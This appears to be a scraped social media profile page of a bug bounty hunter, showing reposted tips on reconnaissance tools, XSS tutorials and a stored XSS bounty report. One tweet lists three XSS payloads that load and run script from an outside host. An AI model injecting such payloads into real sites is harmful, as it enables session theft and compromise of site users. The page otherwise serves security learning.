Vipin Panchal
@dirtycoder0124
A positive, never give up person. Founder of https://blindf.com Telegram group https://t.me/+xa7Q6GcEudFkYzA1
You might like
Paste the data, and it will extract the domains. Not perfect, but useful for me. #bugbountytips #BugBounty dirtycoder0124.github.io/domain-extract…
Just got a reward for a high vulnerability submitted on @yeswehack -- (XSS) - Stored (CWE-79). yeswehack.com/hunters/dirty0… #YesWeRHackers Steps: 1. Found misconfigured Algolia key 2. Escalate it into Stored XSS 3. Payload executed when searching for a specific keyword #bugbountytips
Bug Bounty Search Engine Google advanced search queries generator for target domain: File & Directory Discovery Vulnerabilities & Exploits Subdomain & Asset Discovery And lot more github.com/gatiella/Bug-B… #InfoSec #BugBounty #bugbountytips #CyberSecurity
Stop missing cache poisoning vulnerabilities. Most hunters only test X-Forwarded-Host and miss 90% of the attack surface. I wrote a complete guide to finding what others miss: medium.com/@Aacle/the-cac… #bugbounty #infosec
LLM-powered subdomain enumeration tool.⚔️ - github.com/samogod/samosc… #infosec #cybersec #bugbountytips
Everyone hunts for common bugs… but the real rewards often hide in the underrated ones. I’ve made a YouTube playlist — “Underrated Vulnerabilities” showing how to find impactful bugs most hackers miss. Practical. Real. Eye-opening. Watch here: youtube.com/watch?v=GZ5yaQ…
Want to learn XSS from scratch and turn it into real, practical skills? I made a 23-video YouTube playlist that takes you from basic payloads to advanced XSS chains — with live target demos. Completely FREE. Watch the playlist youtube.com/watch?v=1WFEVp…
Best Alternatives to alert(1) #XSS Payload 1. import('//X55.is') x55.is/brutelogic/xss… 2. $.getScript('//X55.is') * x55.is/brutelogic/xss… 3. appendChild(createElement`script`).src='//X55.is' x55.is/brutelogic/xss… * requires jQuery loaded on DOM #hack2learn
Check this out! It's a solid one, though, that I often use while hunting :) github.com/TheArqsz/JSRec…
Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips
🔍 Unlock the secrets of the web with "The Art of Web Reconnaissance: Bug Bounty & Ethical Hacking"! 🌐💻 📌 What you'll learn: - Advanced web reconnaissance techniques - Identifying and exploiting vulnerabilities - Best practices for ethical hacking - Real-world bug bounty…
Now you can search keywords/secrets in both HTML+JS files. Also, it shows all URLs with parameters on the page. Already found some open redirects using this extension. #bugbountytips #bugbounty github.com/dirtycoder0124…
United States Trends
- 1. Brian Cole 3,465 posts
- 2. #Kodezi N/A
- 3. Walter Payton 6,305 posts
- 4. Chronos N/A
- 5. Price 259K posts
- 6. #25SilverPagesofSoobin 27.1K posts
- 7. Merry Christmas 66.2K posts
- 8. Good Thursday 37.5K posts
- 9. #WPMOYChallenge 8,757 posts
- 10. $META 11.4K posts
- 11. The FBI 104K posts
- 12. #thursdayvibes 2,706 posts
- 13. #NationalCookieDay N/A
- 14. yihe N/A
- 15. Metaverse 7,753 posts
- 16. Dealerships 1,684 posts
- 17. Hilux 11.2K posts
- 18. Somali 242K posts
- 19. GLOWING FAYE AT RED SEA FILM25 45.1K posts
- 20. Happy Friday Eve 1,130 posts
You might like
-
mohammed eldeeb
@malcolmx0x -
Geekboy
@emgeekboy -
KNOXSS
@KN0X55 -
Jasmin Landry
@JR0ch17 -
Japz (h4nt3rx) 🕷️🏴☠️
@japzdivino -
Wh11teW0lf
@Wh11teW0lf -
Pratik Yadav
@pratikyadav7_ -
Rahul Maini
@iamnoooob -
streaak
@streaak -
pwnmachine 👾
@princechaddha -
Jenish Sojitra
@_jensec -
Khizer Javed
@KHIZER_JAVED47 -
Rodolfo Assis
@RodoAssis -
Saad Ahmed
@XSaadAhmedX -
Mahmoud Gamal
@Zombiehelp54
Something went wrong.
Something went wrong.